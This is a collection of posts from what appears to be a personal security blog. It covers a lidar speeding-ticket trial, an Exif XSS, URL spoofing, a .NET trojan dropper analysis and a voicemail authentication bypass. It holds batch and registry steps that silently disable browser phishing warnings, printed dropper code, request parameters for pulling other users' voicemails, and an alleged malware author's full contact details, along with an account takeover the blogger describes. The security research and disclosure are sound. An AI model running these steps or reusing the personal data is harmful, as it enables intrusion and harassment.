Everyone wants to know how to beat a speeding ticket, red light camera, or breathalyzer test but how many actually believe they are innocent? Regardless your motive, the common denominator is that you have a legal right under the United States Constitution to provide a valid defense for the alleged violation. I am sure some of you are asking, “What does this have to do with technology or security?” and my response is, EVERYTHING!

The Inside Scoop

On January 7th, 2010 I was pulled over by a Lakeland Police Officer who allegedly clocked me going 64MPH in a 40MPH zone. I had just turned right at a red light and pulled up next to a truck when he was pointing the laser radar gun (lidar) in my direction. I didn’t believe I was speeding but decided to not speak up since it was my word against a machines. Amazed at the alleged speed, I elected to go to court rather then pay the $264 for something that I believed to be inaccurate. This is when it all started…

The Crossroads

My arraignment was set for February 11th and the Hearing Officer (Judge) opened up with a statement explaining the State of Florida presumes that any electronic device used for measuring speed is considered accurate and operating correctly if the operator provides proof of training, the radar gun has it’s 6 month certification, and the radar gun log with the date in question on it. This left me in a very awkward state; Do I pursue my innocence or just suck it up and get railroaded? Of course I plead ‘Not Guilty’ and made an ad-hoc request to the Hearing Officer/Judge. My request was for the release of the source-code used by the radar gun in question. My prior research before court showed that the LTI 20/20 Radar Gun has had a well researched case in its inaccuracy. The source-code was ordered to be released  and they pushed back the court date to give the State of Florida ample time to request and deliver.

• The Great Speed Gun Scandal
• Laser-Based Speed Camera Fails Accuracy Test
• BBC Documents Errors in US Laser Speed Guns
• UK Court Finds Long-Range Speed Camera Inaccurate
• BBC Inside Out – Mobile Speed Cameras

A Sticky Situation

If the State of Florida relies on a device to bring charges, infractions, or fines then its only legal that the same device should considered for a competent defense for the Defendant ensuring the rights under the Florida and United States Constitution. If the device source-code is withheld then what defense does the Defendant have? What will the source code tell us? If it is withheld, what is it hiding besides trade-secrets? Where will closed-source devices used by Government agencies lead our civil rights since the use of technology is growing more and more everyday? Will non-disclosure of source-code open up Pandora’s box for anyone cited or charged where an electronic device was used to determine guilt? I don’t know, but I can tell you that my motive is not to try to save the world.

Dooms Day

My non-jury trial is scheduled for April 8th and I have yet to receive any source-code. Today I filed a ‘Motion to Compel Radar Gun Source Code’ hopefully to enforce the release of the source-code so I can accurately defend myself. The problem now is that court is in 2 weeks and I haven’t even started to dissect the source code.

Technological Barriers

In almost all cases of traffic infractions, the use of some sort of mystical device, whether it be a radar gun or a red light camera, is used to determine someones guilt. The court usually presumes the device to be accurate if it is tested and approved through a specific set of tests inside of a controlled environment. This makes it difficult, if not impossible, to accurately defend your innocence because of the pre-conceived notion by the Judge or Hearing Officer that the device is true in its findings. What if a defendant wanted to review the source-code to the device, would it be made available for inspection? What about validating that the firmware on the device is the same firmware that was calibrated and certified during the Federal approval process? What I am getting to here is that there are major barriers restricting valid attempts of defense when facing a loss of driving privileges, financial penalties, and potential incarceration. This makes for complete closed-source devices and opposes the recent “Open Government Directive” instituted by our President.  Looks like its moving towards a major violation of our Civil Rights.

The Proof is in the Footage

(Sorry for the quality, its all I could get from BBC)

• 1 min 34 secs – 2 min 34 secs – Explanation of the ‘slip effect’
• 3 min 54 secs – 4 min 55 secs – False Results

UPDATED: 03/09/2010

Wow, what an exhausting trial. The officer and I went head to head for awhile discussing the inconsistencies in the lidar gun. I shown actual pictures of a LTI 20/20 lidar gun being used in a higher speed capture due to a ‘Slip Effect’, ‘Reflection’, ‘Beam Spread’, and ‘Misalignment’.

The Judge and Officer argued that because traffic court is not under the same laws that govern criminal court, they have no obligation to provide evidence under ‘discovery’ to a defendant for defense. The Judge also refused to enforce her previous order from arraignment for disclosure of source code stating that the Florida law requirements of what has to be shown (i.e. device certification, daily logs, and trainer certification) has been met by the Officer. She also argued that since it was intellectual property of a company she would not compel the State. The Officer admitted to using the device from inside the vehicle without a tripod even though he agreed the manufacturer recommended alignment with a tripod, the NHSTA required certification on a tripod, and the State of Florida requires calibration on a tripod.

Another thing they refused to take into consideration was the amount of time it would have taken me to cross the laser beams path from where I had taken my right hand turn at the red light. The approximate distance confirmed by the officer was .2/mile.  To travel .2/mile at 64 MPH would mean I would have had to been going 28.61 Meters Per Second making total travel time 11 seconds. This is assuming there is no traffic but keep in mind I was behind a black truck up until I switched lanes just a few seconds before I crossed the .2/mile mark and was clocked.

The officer did make some good statements regarding my defense. First, he questioned the dates on the pictures that I shown stating that technology changes drastically in 4 years. This is very true, my rebuttal was that without seeing the source code there was no way to tell if and what changes occurred therefore we would have to assume that these LTI 20/20 devices are still flawed. His next bullet was that the pictures show a LTI 20/20 Marksman and not a Ultralyte. Once again, very true and very good statement. My rebuttal to this is that all LTI 20/20 devices are using the same codebase with different features. They are not going to provide a different speed calculation algorithm for different devices.

The Verdict
After we were finished tearing each other apart, the Judge ruled to deny my motion to dismiss and adjudicated me guilty using the previously used “Florida law requirements” as grounds for a guilty verdict. This is very interesting considering the State of Florida failed to comply with a court order, the proof that the LTI 20/20 devices are pron to miscalculated readings, the allotted time it would have taken me to cross the laser beam, and the device failing to comply with the governing the laser beam size requirements under Florida Statue 15B-2.016(2)(c).

The Conclusion
In most cases like this, the defendant would not even pursue challenging a laser radar (lidar) ticket. In the event they do, everyone including the Judge, assumes the defendant is guilty leaving the objective of the defense to prove innocence. The catch 22 is that the prosecution hides behind laws that restrict defendants from being able to prove a defense because all that is required for a guilty verdict is a few pieces of paper. Whats more alarming is that these pieces of paper (device certifications and training) do not take into account real world scenarios or the possibility of slip, beam spreading, or reflection. They get a stamp of approval which is the key to the court systems lock. How can this be a ‘right to fair trial’ and even more how does this satisfy the ‘rights of the accused’? They argue its not criminal but if it is not criminal, how is the court allowed to impose fines, fees, points on your license, suspend your license, or even sentence you to jail time?

My next step is to appeal the Judges verdict. A few people asked if I would be willing to appeal it and take it further. Some even said they would donate to help offset some of the fees. This is no longer about a speeding ticket, its bigger. Its now about your civil rights as a United States citizen. If you are willing to support me in any way, please send me an email: michael at iGlobalOnline dot com.

Slip Effect

• Wall clocked at 100 MPH
• Truck No-Slip
• Truck Slip

Reflection

• Standing still car with a car passing
• Standing still car with a van passing
• Standing still car with a motorcycle passing

Beam Spread

• Motorcycle Before Spread
• Motorcycle After Spread

Misalignment

• Vehicle Moving with speed of 0 MPH
• Vehicle Stopped with speed of 17 MPH

* Pictures from A Review of Laser Speed Meters in Road Traffic Policing By: Paul D. Lee

I also brought forth a scientific report showing the actual laser divergence was 1/3 larger then the manufacturer reported. This is important because the Florida law states,

15B-2.016 Tests to Determine Accuracy of Laser Speed Measuring Devices.
(2)(c) – Sight Alignment/Beam Pattern Test.

The sighting device will be checked for accuracy to determine that it remains within the laser beam at all distances from 500-3000 feet. This may be determined from calculation based on an initial beam pattern/sight alignment analysis. The beam will be analyzed to determine that it is within the pattern/size tolerances specified by the manufacturer.

Which means the certification of the actual gun should not have passed.

Divergence Calculations

Distance                   Claimed Laser Beam Width         Actual Laser Beam Width
100                               0.3                                                                   0.44
200                               0.6                                                                  0.88
400                               1.2                                                                   1.76
500                               1.5                                                                   2.20
800                               2.4                                                                   3.52
1000                             3.0                                                                  4.40

Claimed divergence:            3.0 milli-radians
Actual divergence:                4.4 milli-radians

* Report Concerning Tests Performed at Elvington Aerodrome on 2 December 2006, by Dr. Michael Clark, dated 6 January 2007.

The tools of the trade

• Firefox 3.6
• A basic JPEG image
• exiv2 – http://www.exiv2.org/
• Mozilla’s demo Exif web application
  

A simple XSS construction

I start with writing a real quick alert onload into a basic HTML file I will be hosting on the web. This will launch an alert box when the HTML loads in the users browser.

Contaminating the Exif metadata

Using a image metadata tool called exiv2, I inject the iframe into the JPEG image by simply writing to the ImageDescription. By calling exiv2 with the -pv flag, you notice the ImageDescription was successfully written.

Link: Sample image used in example

Testing the payload

For testing, we will use Mozilla’s own demo page using FileAPI and an Exif parser written by Jacob Seidelin. The page is located at: http://demos.hacks.mozilla.org/openweb/FileAPI/

When you drag and drop the contaminated image into the box in the web app, you immediately notice that the Exif data is parsed and processed without filtering. Since our injection was an iframe, it then loads content from our hosted file.

A quick and easy developer work around

Ok, since this exploitation isn’t really in FileAPI or Firefox 3.6 but rather the Exif parser within the web application, there isn’t much that can be done. Developers should always process strings through a filter before rendering it on a page. By doing this, you take complete control of how and what renders within your users browser eliminating the possibility of malicious code being executed.

UPDATE: 03/28/2010

After releasing to Full Disclosure, it was reported to Mozilla and they have since removed access to the demo site until it is fixed. I probably should have notified Mozilla myself but since it was just a silly XSS in a demo site, it didnt cross my mind.

Ref: https://bugzilla.mozilla.org/show_bug.cgi?id=555574

The result is a URL similar to: http://1249717651/

As you see, there is no real way to know whether your on the Official Google web page or if the site you are at is an attack site waiting for you to do something.

All your URL are belong to us

You can easily place a random website location as a username in front of the dotless IP which would really confuse the user. In this example, I will show you how to forge the www.bing.com URL but really direct the user to Google.com:

See hyperlink: http://www.bing.com:\@1249717651

Browser inSecurity

Ok so, now that you understand how simple URL obfuscation is; what security do browsers implement to prevent us from accidentally clicking on a malicious link?

With FireFox 3.6

Because the spoofed URL is actually a username that is being concatenated with the dotless IP, FireFox checks whether the site requires authentication. The default installation prompts the user with an alert letting them know the link is suspicious because the requested server does not require authentication however the link contained a login.

With IE7/8, using authentication in line is turned completely off.

Hacking the Gibson

Ok, so we understand there is a potential hazard with spoofed URL’s and we also see that browsers attempt to protect us by either prompting us with a message or disabling the opportunity all together. But just how secure is that? How easy would it be for a trojan to re-enable those features in our favorite browser for future contamination of URL’s?

IE7/8 Instability

Since Microsoft loves to store settings in the registry for just about everything, I am sure you won’t be surprised to know that by adding 2 simple entries in the registry you can re-enable this “feature”.

All you have to do is create 2 new DWORD entries (iexplore.exe and explorer.exe) with the value 0 under the sub-key:

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE

How Firefox flops

Of course Firefox is going to be a little bit more tricky because it doesn’t store its preferences in the registry. The little warning message can be completely disabled by simply setting a custom preferences within Firefox by accessing the settings through typing, about:config in the address bar but that won’t work for our circumstance.

The problem with this is that an attacker that has already infiltrated a machine can overwrite these browser profile settings by injecting a custom setting into prefs.js which is the preferences Firefox loads during initialization.

user_pref(“network.http.phishy-userpass-length”,100);

With a simple one-liner batch script, this feature can be enabled leaving future links prone to becoming spoofed.

• WindowsXP
  FOR /R “C:\Documents and Settings” %%G IN (prefs.js) DO echo user_pref(“network.http.phishy-userpass-length”,100); >> %%G

• Vista/7
  FOR /R “C:\USERS” %%G IN (prefs.js) DO echo user_pref(“network.http.phishy-userpass-length”,100); >> %%G

And then there was Chrome

As frightening as this might sound, Chrome did not protect the user from this at all. Google is usually on-top of things but I guess with Chrome still being fairly immature in the browser arena, we can only hope things get better from here.

Leaving users with their pants down

Why do browsers make it so easy to re-enable this stuff? Firefox preferences should be in a controlled environment behind lock and key. Microsoft IE should at least prompt when a suspicious link is clicked. With the rise in crime-ware Trojans, harvesting bank credentials is going to get easier and easier for criminals.

Under normal circumstances we would notify the vendors to let them know the vulnerability but because this attack vector has been addressed in the previous years, the re-enabling of the functionality is more of a design flaw then a vulnerability.

What’s Next?

You should periodically check whether or not these settings are enabled. New age trojans, such as ‘Koobface’ are using these oldschool tricks to mask their true locations (See Webroot).

I published a utility called ‘Dotless’ which will scan and fix your browser preferences. Check it out in the Utilities Section

Stay tuned as we peek into how this bug is easily exploited on mobile devices.

Tools Used

• PEiD
• Wireshark
• ProcMon
• Reflector
• mIRC (yes, seriously lol)

Checking PE
I opened the malware with PEiD and noticed it was a .NET Trojan. This made for an easy and quick reverse engineer.

PEiD - Soulmate

Disassemble and Analyze
Since .NET can easily be decompiled, I launched Red Gate Reflector and opened the binary up to see whats going on inside. Looks like the developer either lacks knowledge on obfuscation or is simply wanting to do it manually.  I went straight to the Form1_Load to see what happens since this is more then likely going to be the first code execution.

Private Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs)
 Dim tempPath As String = Path.GetTempPath
 FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, _
     OpenAccess.Read, OpenShare.Shared, -1)
 Dim str2 As String = Strings.Space(CInt(FileSystem.LOF(1)))
 FileSystem.FileGet(1, (str2), -1, False)
 FileSystem.FileClose(New Integer() { 1 })
 Dim str3 As String = Form1.t6CEBpl0pZRC46YkNNwiunb(Strings.Split(str2, _
     "@KSJDFSDKFJSDLFJSLKFjslkdfjlKSDJflkSJDflkjdfkjsdlk@", _
     -1, CompareMethod.Binary)(1), "kSjdflskdfj293857OLSKDjflkksdfj9827352lssjdf2983572o3ijLSKDfjlskjfsf")
 FileSystem.FileOpen(2, (tempPath & "\Out.exe"), OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default, -1)
 FileSystem.FilePut(2, str3, -1, False)
 FileSystem.FileClose(New Integer() { 2 })
 Process.Start((tempPath & "\Out.exe"))
 Me.Close
End Sub

It looks fairly straight forwarded.

1) Locates the TEMP path
2) Read the executing assembly
3) Calls a function that strips the embedded binary into a separate string
4) Writes the embedded binary into Out.exe in the TEMP path
5) Executes the embedded binary

PEiD on the trojan binary
I decided to write a quick application in .NET to extract the embedded binary using the decompiled code from the dropper. Using PEiD on the new trojan, I noticed it was nothing more then a compressed executable.

PEiD - Trojan

I just went ahead and extracted the contents using WinRar and found 2 mIRC scripts, 3 text files, and an image.

Extract - Trojan

See crime.mrc

See ok.mrc

See image.jpg

Just by looking at the crime.mrc you can tell what the trojan is going to do. It contains the instructions for the backdoor when its executed.

Soulmate crime.mrc analysis
1) When it first starts it executes the .st logic
2) It reads the text files and sets random nickname/realname/ident
3) Sets a bunch of settings
4) Connects to the UnderNET irc network
5) Logs in to cservice using the username: shakay
6) Sets notify on a bunch of nicknames

Playing with the trojan
So, noticing how lame this botnet really looks on the inside I decided to fire-up Wireshark and Procmon. I launched the dropper and immediately noticed IRC traffic along with a nice image pop up. I would post the Wireshark capture but its pretty newbish.

I looked at ProcMon and seen that it did indeed save Out.exe along with a bunch of other files as hidden system files into a TEMP path.

• daemon.exe – a mIRC client binary
• temporarly.reg – registry settings for start-up execution
• catchme.bat – a batch file for executing everything

In the folder also contained the extraction of the Trojan.

Developer Signature
Going back to the earlier .NET dis-assembly, I looked for a unique string that might help me identify the developer. The first one I tried was the string:

Google Search: Strings.Space(CInt(FileSystem.LOF(1)))

I jumped straight into google and guess what I found? A Pastebin of the signature match as the first result. Gotta love Google!

See String Match

Looks like the Pastebin code is a VB.NET binder/crypter that attempts to evade detection from many known applications and also uses the same coding methodology our dropper uses.  Hmmm… who is this RiverThief guy that posted the Pastebin?

Let’s try out our friend, Google, again!

Google Search: riverthief malware

Google - RiverThief Malware

The thing I love about Google is how it always cache’s sites. It looks like our RiverThief guy has some connection to writing undetectable malware and owns a botnet. Also in the results, you notice two domains www.riverthief.info and riverthief.co.cc. I went ahead and grabbed the  Registrar information for riverthief.info.

Registrant ID:CR40000685
Registrant Name:River Thief
Registrant Organization:
Registrant Street1:654 verginia lane
Registrant Street2:
Registrant Street3:
Registrant City:Houston
Registrant State/Province:Texas
Registrant Postal Code:77042
Registrant Country:US
Registrant Phone:+1.2814441585
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:riverthief@live.com

RiverThief Home

RiverThief - Phone

Playing on IRC
So I fired up mIRC, used some settings from the text files earlier, and joined #soulmate since I found that channel in the crime.mrc. Immediately a user nicknamed “wolf” tried to issue commands to me. I sent him a private message refusing to comply. LOL! I manually authenticated using the shakay user, logged into cservice’s website, and changed shakay’s password.

Wolf wasn’t very happy. He kick/banned me with some vulgar language. Then he invited me back into the channel begging me to release the shakay username (which was registered to the email: shakay@url.ro). All he had to do was reset the password.

Conclusion
Malware writers and bot herders seem to be using the same old tricks with newer technologies. Although the .NET framework is required for this dropper to backdoor the machine, .NET is becoming more and more popular. This will prove to enable malware writers to build droppers very easily. The person behind this one obviously didn’t spend too much time making this.

Chances are either some romanian hacker grabbed RiverThief’s VB.NET code and took a shot at it or RiverThief is behind this botnet. Either way, it was rookie malware and simple to reverse.

Phone Fusion provides an app for its Visual Voicemail Plus on all major smartphones and carriers (See list). I have only evaluated the version provided for the Android, but based on the method of communication it seems it would be the same across all platforms.

The device handles the authentication for syncing with the gateway providing the user with new voicemails. The issue lies within the way the communication occurs with the users voicemail storage.

Communication with the voicemail storage gateway is through an unencrypted request via HTTP with no authentication. This communication is visible locally by watching normal HTTP traffic.

The vulnerability is triggered when issuing a crafted GET request to the applications gateway web service. This request forces the gateway to provide an audio file of the voicemail in MP3 or VTT format.

Phone Fusion has been notified regarding this issue, promptly responding with more concern for who I was then the issue at hand. They have not confirmed their plans on patching this issue.

Stay tuned as we wait for them to decide what they plan on doing. If I do not hear back regarding their plans I will provide a proof of concept link on 02/10/2010.

UPDATE 02/10/2010

As promised, the Proof of Concept and some information regarding the unique domainid.

POC: Download straight from my mailbox.

Parameters

action: Tells the server how to handle the request. (GET downloads voicemail, MULTIPERMDELETE erases multiple voicemails)
send_header: Tells the server to force the headers for voicemail downloads.
output_format: Audio Format (MP3 or VTT)
mdnis: Used by Phone Fusion to determine the inbound routing.
domainid: Unique but potentially forcible message id. <yyyymmddhhmmssmm>001000<9 digit identifier>

If anyone finds more information of how the domainid is generated, feel free to email me or post a comment and I will update the post. Also, if anyone can determine this is working cross-platform (im sure it is) that would be great.

UPDATE 02/15/2010

It looks like they issued a quick patch. PF Visual Voicemail looks like it no longer is using plain-text HTTP for its connection, however, the POC above still works. Interesting… I will dig into this a bit more in the near future.

Since these types of applications store sensitive data, I wanted to see how hard it was to obtain this information assuming a handset was lost or stolen.  The common denominator between all the popular apps were the use of a master password. Some of the apps stored master passwords locally while others stored them remotely. All the apps stored banking information, passwords, and credit card numbers.

With being able to turn off your SIM card if your phone is lost or stolen; its not as easy to change passwords to sites or notify banks of accounts that could have been compromised.

With such a major number of users adding Android MOD’s such as Cyanogen to their device, it greatly increases the risk of personal information being leaked when a phone is stolen or lost.

We have already started notifying vendors of the vulnerabilities we have found.  Stay tuned as we start posting some of the results, you will be surprised at just how easy these applications could be compromised by attackers.

As a security analyst, I decided to start examining how these apps work. What I found was astonishing! So far, almost all the apps I have dissected contain extreme high risk vulnerabilities when storing sensitive data. I decided to create this blog to post some of my findings to the world in hopes of providing a break down of just how serious this issue is.
Without giving away too much detail, a highly used app (on all major markets) that provides a visual to your voicemail, has a authentication bypass that allows an attacker to download voicemails in MP3 format from another users mailbox. I have properly notified the vendor on 02/04/2010 and have been providing them with my findings. I will be blogging about this vulnerability on 02/28/2010 or sooner assuming they issue a patch for it.

Stay tuned as I start publicly dissecting these apps. If anyone would like to work with me on projects, feel free to contact me.